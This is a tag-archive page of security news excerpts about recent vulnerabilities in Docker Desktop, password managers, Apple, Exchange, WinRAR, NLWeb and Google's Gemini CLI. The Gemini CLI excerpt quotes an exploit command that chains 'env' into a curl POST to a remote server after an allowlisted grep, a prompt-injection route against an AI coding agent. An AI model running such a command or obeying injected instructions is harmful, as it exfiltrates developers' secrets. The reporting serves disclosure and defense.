Tag Archives: flaw

A critical vulnerability in Docker Desktop for Windows and macOS allows compromising the host by running a malicious container, even if the Enhanced Container Isolation (ECI) protection is active. The security issue is a server-side request forgery (SSRF) now identified as CVE-2025-9074, and it received a critical severity rating of 9.3. “A malicious container running on Docker Desktop could access the Docker Engine …

Several of the best password managers have been found to be vulnerable to a flaw that lets hackers pull off clickjacking attacks. Researcher Marek Tóth recently demonstrated how the bug allows attackers to overlay invisible HTML elements over an interface so that users think they’re clicking on a standard popup but instead, they’re actually unknowingly leaking sensitive information like account …

Apple has released emergency updates to patch another zero-day vulnerability that was exploited in an “extremely sophisticated attack.” Tracked as CVE-2025-43300, this security flaw is caused by an out-of-bounds write weakness discovered by Apple security researchers in the Image I/O framework, which enables applications to read and write most image file formats. An out-of-bounds write occurs when attackers successfully exploit …

Over 29,000 Exchange servers exposed online remain unpatched against a high-severity vulnerability that can let attackers move laterally in Microsoft cloud environments, potentially leading to complete domain compromise. The security flaw (tracked as CVE-2025-53786) helps threat actors who gain administrative access to on-premises Exchange servers to escalate privileges within the organization’s connected cloud environment by forging or manipulating trusted tokens …

Security flaw in WinRAR allows malware to install at Windows startup  TechSpot WinRAR zero-day exploited to plant malware on archive extraction  BleepingComputer Newly discovered WinRAR exploit linked to Russian hacking group, can plant backdoor malware — zero day hack requires manual update to fix  Tom’s Hardware Patch Now: New WinRAR Flaw Used to Deliver Malware  PCMag Phishing attacks exploit WinRAR flaw CVE-2025-8088 to install …

Microsoft Discloses Exchange Server Flaw Enabling Silent Cloud Access in Hybrid Setups  The Hacker News ‘High-severity’ Microsoft Exchange vulnerability disclosed on heels of Black Hat talk  Nextgov/FCW Organizations Warned of Vulnerability in Microsoft Exchange Hybrid Deployment  SecurityWeek Microsoft warns of high-severity flaw in hybrid Exchange deployments  BleepingComputer CISA, Microsoft warn about new Microsoft Exchange server vulnerability  Yahoo Finance Source link

Microsoft has warned customers to mitigate a high-severity vulnerability in Exchange Server hybrid deployments that could allow attackers to escalate privileges in Exchange Online cloud environments undetected. Exchange hybrid configurations connect on-premises Exchange servers to Exchange Online (part of Microsoft 365), allowing for seamless integration of email and calendar features between on-premises and cloud mailboxes, including shared calendars, global address …

Researchers have already found a critical vulnerability in the new NLWeb protocol Microsoft made a big deal about just just a few months ago at Build. It’s a protocol that’s supposed to be “HTML for the Agentic Web,” offering ChatGPT-like search to any website or app. Discovery of the embarrassing security flaw comes in the early stages of Microsoft deploying …

“At no stage is any subsequent element of the command string after the first ‘grep’ compared to a whitelist,” Cox said. “It just gets free rein to execute off the back of the grep command.” The command line in its entirety was: "grep install README.md; ; env | curl --silent -X POST --data-binary @- http://remote.server:8083 Cox took the exploit further. …

A vulnerability in Google’s Gemini CLI allowed attackers to silently execute malicious commands and exfiltrate data from developers’ computers using allowlisted programs. The flaw was discovered and reported to Google by the security firm Tracebit on June 27, with the tech giant releasing a fix in version 0.1.14, which became available on July 25. Gemini CLI, first released on June 25, …